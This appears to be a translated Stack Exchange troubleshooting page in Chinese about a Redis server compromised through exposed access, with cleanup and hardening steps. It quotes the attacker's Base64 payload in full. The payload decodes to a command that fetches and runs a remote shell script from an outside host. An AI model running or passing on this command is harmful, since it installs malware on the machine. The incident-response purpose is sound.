Redis键自动变为backup序列、值转Base64,Linux环境异常求助
Redis键被篡改为backupN且值为恶意Base64脚本的排查与修复
你的服务器已遭遇入侵,攻击者利用Redis的访问漏洞植入了恶意定时任务,同时篡改Redis键值对留存恶意指令。先拆解你提供的示例脚本:
echo Y2QxIGh0dHA6Ly9raXNzLmEtZG9nLnRvcC9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash
Base64解码后得到cd1 http://kiss.a-dog.top/b2f628/b.sh,这是攻击者用来下载并执行挖矿或其他恶意程序的命令。
紧急处置
- 暂停Redis服务,切断攻击者利用通道:
systemctl stop redis-server # 适用于systemd系统 # 或 service redis stop # 适用于init.d系统 - 清理恶意定时任务:
- 查看当前用户定时任务:
crontab -l,找到可疑条目后执行crontab -e删除对应行 - 检查系统级定时任务目录,删除可疑文件:
ls /etc/cron.d/ /etc/cron.hourly/ /etc/cron.daily/ /etc/cron.weekly/ /etc/cron.monthly/ rm -f 可疑文件名
- 查看当前用户定时任务:
- 清理Redis中的恶意键值对:
启动Redis后执行:redis-cli keys "backup*" | xargs redis-cli del - 查杀恶意进程:
用top或ps aux定位CPU/内存占用异常的陌生进程,执行kill -9 进程ID终止,同时删除进程对应的执行文件。
根源修复
- 加固Redis访问控制:
- 修改
redis.conf,绑定本地IP:bind 127.0.0.1,禁止公网直接访问 - 确保保护模式开启:
protected-mode yes - 设置强密码:
requirepass 复杂随机密码,重启Redis后连接必须验证密码 - 禁止Redis以root用户运行,创建专用redis用户启动服务
- 修改
- 排查其他入侵入口:
- 查看SSH日志
/var/log/auth.log,清理异常登录记录,禁用密码登录改用SSH密钥,限制允许登录的IP范围 - 检查系统用户列表
cat /etc/passwd,删除陌生可疑用户 - 若服务器部署了Web服务,排查是否存在SQL注入、文件上传等漏洞,及时修补
- 查看SSH日志
- 检查Redis数据目录:
查看redis.conf中的dir配置项,进入对应目录删除可疑脚本或程序文件。
长期预防
- 定期更新Redis和系统内核、软件包,修复已知漏洞
- 启用Redis日志功能,定期查看
/var/log/redis/redis-server.log,及时发现异常访问 - 用防火墙(iptables/ufw)限制Redis端口(默认6379)的访问,仅允许信任IP连接
内容的提问来源于stack exchange,提问作者Budh
相关产品推荐
相关产品推荐

